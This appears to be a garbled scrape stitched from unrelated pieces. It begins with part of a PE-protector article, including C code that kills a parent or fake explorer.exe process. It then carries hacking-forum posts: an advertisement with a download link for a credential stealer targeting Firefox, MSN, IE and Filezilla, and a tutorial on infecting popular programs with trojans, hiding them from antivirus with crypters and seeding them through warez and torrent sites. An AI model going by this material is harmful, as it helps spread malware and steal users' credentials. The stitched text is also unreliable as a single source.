PID_child; DWORD PID_parent,PID_explorer; HANDLE hh_parnet = NULL; PROCESSENTRY32 pe32 = {0}; pe32.dwSize = sizeof(PROCESSENTRY32);//0x128; PID_child=GetCurrentProcessId();//getpid(); hSnapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,0); if (Process32First(hSnapshot, &pe32)) { while (Process32Next(hSnapshot, &pe32)) { GetFileNameFromPath(pe32.szExeFile); CharUpperBuff(pe32.szExeFile,strlen(pe32.szExeFile)); if(strcmp(pe32.szExeFile,"EXPLORER.EXE")==0) { PID_explorer=pe32.th32ProcessID; } if(pe32.th32ProcessID==PID_child) { PID_parent=pe32.th32ParentProcessID; } } } if(PID_parent!=PID_explorer) { hh_parnet= OpenProcess(PROCESS_ALL_ACCESS, TRUE, PID_parent); TerminateProcess(hh_parnet, 0); } else { MODULEENTRY32 me32 = {0}; me32.dwSize = sizeof(MODULEENTRY32); hSnapshot = CreateToolhelp32Snapshot(TH32CS_SNAPMODULE, PID_explorer); if (Module32First(hSnapshot, &me32)) { do { if(PID_explorer==me32.th32ProcessID) { GetWindowsDirectory(lpszSystemInfo, MAX_PATH+1); strcat(lpszSystemInfo,"\\"); strcat(lpszSystemInfo,"EXPLORER.EXE"); CharUpperBuff(me32.szExePath, strlen(me32.szExePath)); if(strncmp(me32.szExePath, lpszSystemInfo, strlen(lpszSystemInfo))) { GetFileNameFromPath(me32.szExePath); if(strcmp(me32.szExePath, "EXPLORER.EXE")==0) { hh_parnet= OpenProcess(PROCESS_ALL_ACCESS, TRUE, PID_explorer); TerminateProcess(hh_parnet, 0); } } } }while (Module32Next(hSnapshot, &me32)); } } } This code will not work under Windows NT 4.0 because of absence ''CreateToolhelp32Snapshot(), Process32First(), Process32Next(), Module32First(), Module32Next()''. But all of these API functions could build by undocumented API function from ''NTDLL.DLL''. You can take a look at [10] 'Windows NT (2000) Native API reference' by Gary Nebbett. Furthermore, I recommend using [11] Process Explorer by Mark Russinovich to explore all run processes in your systems. It will help to understand better them. http://www.programmersheaven.com/articles/Ashkbiz/peprotector1/procexp.gifFigure-2 Eliminate unnecessary data Some time you need to clean all unnecessary data such as debug information, relocation section and making small DOS header and remove MS-DOS stub Program. You should reserve these items in your PE Protector with some considerations. For instance, Relocation section do not have any effect in running EXE files but it plays an important role in OLE-Active Controls and Dynamic Link Libraries. Sample code The project compiles with Visual C++ .net 2003 and doesn't require any spare tools. It works under all Windows version except Windows NT 4.0 and Windows 95. Conclusion This article and its source could be an introduction to PE protector tools and demonstrating how these tools works. I hope it covers the absence of this kind of interesting topics and tools in open source area. References [1] "Microsoft Portable Executable and Common Object File Format Specification", Microsoft Corporation, Revision 6.0, February 1999 [2] "Peering Inside the PE: A Tour of the Win32 Portable Executable File Format", Matt Pietrek, MSDN Library, March 1994 [3a] "An In-Depth Look into the Win32 Portable Executable File Format", part 1, Matt Pietrek, MSDN Magazine, February 2002 [3b] "An In-Depth Look into the Win32 Portable Executable File Format", part 2, Matt Pietrek, MSDN Magazine, March 2002 [4] PEview Version 0.67, Wayne J. Radburn [5] MSDN Library, Microsoft Corporation, April 2003 [6] yoda's Crypter, Danilo Bzdok [7] UPX, the Ultimate Packer for eXecutables, Markus F.X.J. Oberhumer & Laszlo Molnar [8] LZO real-time data compression library, Markus F.X.J. Oberhumer [9] aPLib compression library, Joergen Ibsen [10] "Windows NT (2000) Native API reference", Gary Nebbett [11] Process Explorer, Mark Russinovich

Steals: Firefox 3.x MSN +8.x IE 7.x Filezilla Download: http://www.2shared.com/file/7104013/2a6325a0/SeabraStealer01.html

Repet: Nu garantez ca nu sunt infectate. De fapt chiar banuiesc ca unele sunt infectate. In plus cred ca sunt foarte slabe sanse sa gasiti ceva care sa functioneze bine.

Sa vad ce reusesc, mai intai vreau sa termin un tutorial de care m-am apucat, dar cred ca va dura ceva. Apoi va ajut cu orice, nu e nevoie sa fiu membru, nu ma ocup cu asa ceva, dar daca va pot ajuta va ajut cu placere.

http://bahoi.ro/?p=139

Uploadati fisierele pe un host, setati permisiunile folderului in care se afla la 777, intrati pe pagina HTML, apasati taste la intamplare, apoi vedeti in acel folder daca s-a creat un fisier cu IP-ul vostru.

Daca nu vrei ban si pe acesta, uita-te la data ultimului post inainte de a posta.

Spreading By: Beaver What Is Spreading? Spreading Is The Way Your Program/Trojan/ETC Circulates Around The Internet. This Means That People At Some Point People Spread It For. This Is Your Goal, To Put Something Out There That Is Not Wide Spread And Is Hard To Find. It Is All About Finding That Niche (A Targeted Group Of People, Like Gamers) That Want Something, But Do Not Have It Yet. When This Is Done, People Will Download It And Put It On Their Site For Download or Put It On A Torrent. Getting Started 1. Finding The Right Program This Will Be The Hardest Part. Finding Out What Is Wanted At A Certain Point In Time Is Hard. Find Out What Niche You Want To Go After, For Example If You Are Going After Gamers, But Not Just Gamers, Let’s Say Gamers That Use Steam. You Have A Couple Of Options. One Is You Can Look Around The Net That Will Focus Directly On Steam Gamers (Screen Recorders, Voice Changers, etc.). Another Is You Can Make Your Own Program; This Will Insure That There Is Nothing Else Like It, But Make Sure That The Program Is Useful And It Works. After You Think You Have Found The Right Program, Upload It To Some Warez (Media Sharing) Sites, Like Warez-BB.org And Some Torrent (Peer-To-Peer Sharing) Sites, Like ThePirateBay.org To See How Many Downloads You Can Get In A Day. If The Number Is Below 25 Try Another Program. While 25 Is Decent Number For Beginners, It Is Just Not Enough To Make A Big Impact On The Net. Stay Away From Large Programs (Over 75 MB). 2. Infecting The Program This Will Either Require Money Or Programming Knowledge. If You Choose To Infect The Program That You Found You Make Sure What Ever You Are Infecting It From Is FUD (Fully Undetectable To Anti-Virus Software). To Achieve This You Will Need A Crypter (A Program That Changes The Programs Code To Make It Look It Different When Scanned By Anti – Virus Software). You Can Either Learn To Code One Of These, Which Is The Cheaper Way, But Is Time Consuming Or You Can Buy One From Many Of The Hacking Forums Out There, Like Ukn0wn.ws. They Can Cost Anywhere From $25 To $80. After You Infect The Program Run It Through The Crpyter To Make It FUD. Where To Spread? This Is The Big Question. Knowing Where To Spread You Just Have To Go With Your Instinct, But Below You Will Find A List Of Sites And Site Types I Found Useful In My Spreading. • Warez Sites o Http://www.warez-bb.org o Http://www.Project-W.org o Bookmark Any Warez Sites You Come Across • Torrents o Http://www.ThePirateBay.org o Http://www.MiniNova.org o Http://www.Demonoid.com o Private Torrent Sites Are The Best, Because People Are Trustworthy On There • Forums (Based On Your Niche) o I Cannot Post Any Links, Because Depending On What Type Of Niche You Chose You Will Need To Find Those Types Of Forums. • Youtube o Make A Short Video, No More Than 30 Seconds That Has The Description (Read On That Below). Make Sure To Have Appropriate Music. After The Video Is Uploaded And Processed Submit The URL To Things Like StumbleUpon (Link Sharing) And Digg.com (Social News Site). What Do I Put? The Description Is Where It Makes Or Breaks Your Spreading. Make Sure You Always Use The Same Description. This Allows Easy Copy/Paste For The People That Will Post The Program Elsewhere. • Take At Least 1 Screen Shot Of The Program. Upload That To A Good Image Hosting Site, Like ww.TinyPic.com • Choose A Good File Host Where You Can Track The Number Of Downloads You Are Getting. If You Use Rapidshare.com Then Get A Legit Account. I Use Free Online Storage - File Qube, It Is Free And It Tracks Page Views and Downloads, And It Accepts A Lot Of File Types. • Write Out A Well Thought Out Description That Talks About How The Program Works, What The Features Are, ETC. • When Your Infected Is FUD, Upload It To NoVirusThanks - Free Online Virus & Malware Scan Service Making Sure To Check “Do Not Distribute The Sample”. This Site Scans Your File With All Of The Major Anti – Virus Software. That Check Box Makes Sure They Do Not Send Their Findings To The Anti- Virus Companies, This Means Your Program Will Stay FUD Longer. After It Is Done Grab The BB Code And HTML Code. • Keep Your Descriptions For Later Use. Keep The Description, One For Forums/Warez Sites That Has The NoVirusThanks BB Code, Download Link For Your Program, And The Links Or BB Code For Your Screen Shot(s) And One For Sites That Don’t Use BB Code, That Has The HTML Code From NoVirusThanks, Download Link For Your Program, And The Links Or BB Code For Your Screen Shot(s). Syndication Syndication Means That Others That Have Downloaded Your Program Are Posting It On Other Sites For You. This Means That Your Spreading Has Been A Major Success And You Should Be Happy. This Means You Do Not Have To Try As Hard To Get Download, Because Others Are Doing The Spreading For You. This Has Been A Beaver Tutorial. If You Want To Post This On Other Site Please Leave The Following. Written By Beaver For… http://www.Beaver.WS uNkn0wn.ws - Index page